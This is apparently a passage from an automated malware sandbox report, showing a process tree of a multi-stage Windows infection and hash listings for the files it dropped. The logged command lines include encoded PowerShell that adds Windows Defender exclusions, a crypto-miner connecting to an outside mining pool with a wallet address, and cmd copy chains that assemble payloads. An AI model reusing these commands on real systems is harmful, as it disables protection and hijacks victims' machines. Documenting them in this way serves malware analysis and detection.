                                                                                            cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6624
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2608
                                                                                          • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                                                                            Constraints.com r
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:3988
                                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                                            choice /d y /t 5
                                                                                            8⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6076
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5496
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          7⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:996
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe"
                                                                                        6⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:632
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10052940101\5e58e6ca54.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5924
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1232
                                                                                            8⤵
                                                                                            • Program crash
                                                                                            PID:18132
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:18296
                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10052950101\90d7518177.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:17488
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6612
                                                                                    • C:\Users\Admin\AppData\Local\Temp\onefile_6612_133883928431968366\ZSoeRVBe.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\10466830101\mTk60rz.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6552
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:22216
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:18388
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:18404
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe"
                                                                                    4⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:9460
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473270101\8f7a84c735.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473270101\8f7a84c735.exe"
                                                                                    4⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:10576
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473280101\wQI4o11.exe"
                                                                                    4⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:10824
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473290101\VrQSuEQ.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:11908
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:11928
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:12092
                                                                                  • C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:12316
                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                      5⤵
                                                                                        PID:12360
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                          6⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:12524
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        "C:\Windows\system32\svchost.exe"
                                                                                        5⤵
                                                                                        • Downloads MZ/PE file
                                                                                        • Adds Run key to start application
                                                                                        PID:12368
                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe --algo rx/0 -o 196.251.118.49:49301 -u 47kJwZakUCHUPtYBwg8Hc5U3VEjqmPmKiYy8GPVQvdagRU2cTt9Fs4J34haCDRQNPdQ6oyhPQbmxP1dUp6aXVoogBCh9Dva.Worker_CPU -p x --cpu-max-threads-hint=50 -k
                                                                                  2⤵
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5504
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
                                                                                  2⤵
                                                                                    PID:5284
                                                                                    • C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\y1ETaysj\s2gfK0OOpDvXgO4x.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:16672
                                                                                      • C:\Users\Admin\AppData\Local\Temp\pGHcM3xD\7lbjR2suD8JTv0Zd.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\pGHcM3xD\7lbjR2suD8JTv0Zd.exe 16672
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:16700
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 16700 -s 636
                                                                                          5⤵
                                                                                          • Program crash
                                                                                          PID:17516
                                                                                      • C:\Users\Admin\AppData\Local\Temp\y1ETaysj\9BHd1vZZWudjpitz.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\9BHd1vZZWudjpitz.exe 16672
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:7068
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 644
                                                                                          5⤵
                                                                                          • Program crash
                                                                                          PID:9360
                                                                                      • C:\Users\Admin\AppData\Local\Temp\y1ETaysj\8pg3R6AjxHpV7qLM.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\y1ETaysj\8pg3R6AjxHpV7qLM.exe 16672
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:10856
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:11500
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                    2⤵
                                                                                      PID:12480
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                      2⤵
                                                                                        PID:12488
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc YQBEAEQALQBNAHAAUABSAGUAZgBFAFIAZQBOAGMARQAgAC0AZQB4AGMAbAB1AFMAaQBvAG4AUABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACwAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBPAFIAYwBFADsAIABBAEQAZAAtAE0AcABQAFIAZQBmAEUAcgBlAG4AQwBFACAALQBFAFgAQwBsAFUAUwBpAE8ATgBwAHIATwBDAGUAUwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBvAGQAZQBcAEkAcwBWAGEAbAB1AGUAQwByAGUAYQB0AGUAZAAuAGUAeABlACAALQBmAE8AcgBjAEUA
                                                                                      1⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6904
                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                      1⤵
                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                      • Checks BIOS information in registry
                                                                                      • Executes dropped EXE
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:7060
                                                                                    • C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Mode\IsValueCreated.exe
                                                                                      1⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6336
                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                                        2⤵
                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5428
                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                      1⤵
                                                                                        PID:7156
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                        1⤵
                                                                                          PID:5524
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBNAFAAUABSAEUARgBlAFIARQBuAEMAZQAgAC0ARQBYAEMATAB1AHMASQBPAG4AUABSAG8AQwBlAFMAUwAgAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAGYAbwByAGMARQA=
                                                                                          1⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:7076
                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                          1⤵
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Identifies Wine through registry keys
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:6072
                                                                                        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5272
                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                          1⤵
                                                                                            PID:3420
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6360 -ip 6360
                                                                                            1⤵
                                                                                              PID:16580
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 16700 -ip 16700
                                                                                              1⤵
                                                                                                PID:17456
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5392 -ip 5392
                                                                                                1⤵
                                                                                                  PID:22212
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5924 -ip 5924
                                                                                                  1⤵
                                                                                                    PID:17844
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 22080 -ip 22080
                                                                                                    1⤵
                                                                                                      PID:18180
                                                                                                    • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                      1⤵
                                                                                                        PID:20948
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                        1⤵
                                                                                                          PID:21756
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7068 -ip 7068
                                                                                                          1⤵
                                                                                                            PID:9324
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                            1⤵
                                                                                                              PID:10040
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                              1⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:11724
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:11776

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\ProgramData\0r1vaa1no8.exe

                                                                                                              Filesize

                                                                                                              584KB

                                                                                                              MD5

                                                                                                              2e56fa5b962d651c073c02467de8e001

                                                                                                              SHA1

                                                                                                              9667eed96a021d201ac35061bec780fca44a4207

                                                                                                              SHA256

                                                                                                              cf35a65bf2b0b1aa84c9629e32510475f87502e0c8a2745f4a53d7bdaa5bfd10

                                                                                                              SHA512

                                                                                                              5ead0d6e435b691ae9276468f2a24096db92cb167f8d03ed0f156f39634f91bf3ffde46b4865ea247e519ff2311f2b241d6ed2bbbe7a632b0ba3335ccfd03274

                                                                                                            • C:\ProgramData\89r1ngvkng.exe

                                                                                                              Filesize

                                                                                                              952KB

                                                                                                              MD5

                                                                                                              f258ba9ca646b9749d7f22a3dfdc77d2

                                                                                                              SHA1

                                                                                                              36ee4ef9e49e0ebb8973c8f50849d6367c03e69b

                                                                                                              SHA256

                                                                                                              fcc3edcd526b0c746998d72af8ce9cc29b0bd801f767078cc472f93d57eee9ef

                                                                                                              SHA512

                                                                                                              764ecce1c087bceb9dbaab806bce134dae40a0a89a8aa6ab9e566bf2206ca79850cb2a109111455f9c14dbbdb6783193958c9007f7780d444e3837fa7dbdea3a

                                                                                                            • C:\ProgramData\asr1dbsjmy.exe

                                                                                                              Filesize

                                                                                                              251KB

                                                                                                              MD5

                                                                                                              58d3a0d574e37dc90b40603f0658abd2

                                                                                                              SHA1

                                                                                                              bf5419ce7000113002b8112ace2a9ac35d0dc557

                                                                                                              SHA256

                                                                                                              dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5

                                                                                                              SHA512

                                                                                                              df61329a32e9261b01c5b7d95e0d9a3fb8cc36e5d90ede72bc16befe00fb32c221898a8346db9de07c0f5dcba57dcdbb09a22ca8b73223f989d33ec433c3a90a

                                                                                                            • C:\ProgramData\gLLIVii8sicm

                                                                                                              Filesize

                                                                                                              96KB

                                                                                                              MD5

                                                                                                              6066c07e98c96795ecd876aa92fe10f8

                                                                                                              SHA1

                                                                                                              f73cbd7b307c53aaae38677d6513b1baa729ac9f

                                                                                                              SHA256

                                                                                                              33a2357af8dc03cc22d2b7ce5c90abf25ac8b40223155a516f1a8df4acbf2a53

                                                                                                              SHA512

                                                                                                              7d76207c1c6334aa98f79c325118adf03a5ba36b1e2412803fd3e654a9d3630c775f32a98855c46342eba00d4a8496a3ded3686e74beaac9c216beee37aa5cb7

                                                                                                            • C:\ProgramData\y5890\3wtr1v

                                                                                                              Filesize

                                                                                                              6KB

                                                                                                              MD5

                                                                                                              91bad29c9a9ef002805254b3f381526f

                                                                                                              SHA1

                                                                                                              4bf437f6059d37b6b3a3635ef0543bc84ab7db7c

                                                                                                              SHA256

                                                                                                              7b436be81e558e77bd02a3225ec79e421de67fd2b28fc199141af18e46c151a7

                                                                                                              SHA512

                                                                                                              c1727abd0de4de79550d3aa2e7b0ea3b9335563ed6e9fecf7a3744c3afc3026aa499aed1197f7e34ebe0b568ef9f14e847d8fb6f5f93659c6673c36b58c9d85e

                                                                                                            • C:\ProgramData\y5890\3wtr1vkf3

                                                                                                              Filesize

                                                                                                              40KB

                                                                                                              MD5

                                                                                                              dfd4f60adc85fc874327517efed62ff7

                                                                                                              SHA1

                                                                                                              f97489afb75bfd5ee52892f37383fbc85aa14a69

                                                                                                              SHA256

                                                                                                              c007da2e5fd780008f28336940b427c3bfd509c72a40bfb7759592149ff3606e

                                                                                                              SHA512

                                                                                                              d76f75b1b5b23aa4f87c53ce44c3d3b7e41a44401e53d89f05a114600ea3dcd8beda9ca1977b489ac6ea5586cf26e47396e92d4796c370e89fab0aa76f38f3c4

                                                                                                            • C:\ProgramData\y5890\f3ohlfuk6

                                                                                                              Filesize

                                                                                                              56KB

                                                                                                              MD5

                                                                                                              1c832d859b03f2e59817374006fe1189

                                                                                                              SHA1

                                                                                                              a4994a54e9f46a6c86ff92280c6dabe2bcd4cc42

                                                                                                              SHA256

                                                                                                              bb923abf471bb79086ff9ace293602e1ad882d9af7946dda17ff1c3a7e19f45b

                                                                                                              SHA512

                                                                                                              c4d3be414fa5dd30151cde9f6d808d56c26b031ff3f6446d21a15d071053787b6ba337b12909a56af7bb420f858dba5213f08e64ca9f836f52c98a18762b4bef

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                              Filesize

                                                                                                              40B

                                                                                                              MD5

                                                                                                              eb11d0449e2f631e899c84ee76249f7f

                                                                                                              SHA1

                                                                                                              5560ba98a9b0a1bc85818853429a4b397fd8270f

                                                                                                              SHA256

                                                                                                              33cd082f616d214b36d42fe7af5aa121c12759258aa6df42ad440fcf7785ad3f

                                                                                                              SHA512

                                                                                                              8e6a5823b5b8a0292b2274fab64f855e678eb40feed9744be5ae2795f3d3132d3824e257fd045e3fe37555cfd2b579c637d05dddeeef59a3ddfd4bd001d53808

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\4dd7497a-3cd9-484c-8a5e-0cc7dc3d16cd.tmp

                                                                                                              Filesize

                                                                                                              2B

                                                                                                              MD5

                                                                                                              d751713988987e9331980363e24189ce

                                                                                                              SHA1

                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                              SHA256

                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                              SHA512

                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\e8d1d503-4964-44ba-a284-d3d12a301695.tmp

                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              5058f1af8388633f609cadb75a75dc9d

                                                                                                              SHA1

                                                                                                              3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                              SHA256

                                                                                                              cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                              SHA512

                                                                                                              0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                              Filesize

                                                                                                              80KB

                                                                                                              MD5

                                                                                                              262e9bd7d565a152e717ff8b4764471e

                                                                                                              SHA1

                                                                                                              44cd214e33acbe7fab48c4c254d9bce9f07aa17e

                                                                                                              SHA256

                                                                                                              0ddfb9498abf279af4c14e9230362017432dc4c464f5cf75ed0915a9ffea9f3c

                                                                                                              SHA512

                                                                                                              f7f8bc23b8d4477e55cfe3f799869b8fa82963b628de633ff6305ff0ac8c606ab7beeb642a0d655ccd5e448065750f15249dbdb34140bdebda54d5ab41a3a540

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

                                                                                                              Filesize

                                                                                                              105KB

                                                                                                              MD5

                                                                                                              ecf3d3ce7a6234c2d34575b2c87fbbcc

                                                                                                              SHA1

                                                                                                              0b4d36e769bc0776811a85e98b115e2e37b048cb

                                                                                                              SHA256

                                                                                                              2752908c6b9e4cd7b4aaeeb704f19b04343096ed6981d6687a914aefdd6368ba

                                                                                                              SHA512

                                                                                                              d6793abe58526937b58bf7494f93c195730d1757c16b0c50fab53098fd56ad6d050f04b804d07c132041e4ea18a8aa1c1f302049691250ab9ea82c2a35e34a2a

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                              Filesize

                                                                                                              280B

                                                                                                              MD5

                                                                                                              8ab22d85fb3d91ef8e06badf4f3db6c4

                                                                                                              SHA1

                                                                                                              119d4a2397247587b9e15dde4ec075c67782fe9b

                                                                                                              SHA256

                                                                                                              d41a67512375ce149a526c2cc035b832054f8bdcd5f88b3a7fd3e515b10446cf

                                                                                                              SHA512

                                                                                                              124d73bab52446473b5d0d8a97fd67de394658e572344643e7fd1d173321d8c176d1c21b0b0f84de051f19dccd1c5a9ffe0adbc8e345e96dc2a970b66da9777c

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                              Filesize

                                                                                                              280B

                                                                                                              MD5

                                                                                                              614737c9a3189fac7d73b426109ea750

                                                                                                              SHA1

                                                                                                              685145ec095e7ce90d338b4998ef25ca5a9ac007

                                                                                                              SHA256

                                                                                                              adb27e020e224ec43d28c7160ab70ecb1f0b49dc27a83b9692bc78cbed30472c

                                                                                                              SHA512

                                                                                                              b65bff71ddb7144068ce08963ad2278190aa73459fafa1bdb8b718e86f263b73dff51c59e8953c7c9903c81141d4b2d9ca47dd5c25210cadfd3bf65575d96986

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                              Filesize

                                                                                                              280B

                                                                                                              MD5

                                                                                                              eec55fe349980566b1dbf1d409d28c3e

                                                                                                              SHA1

                                                                                                              654ce4b550defea0851f12e8ff81ae9298bb3f60

                                                                                                              SHA256

                                                                                                              2e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe

                                                                                                              SHA512

                                                                                                              58e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059

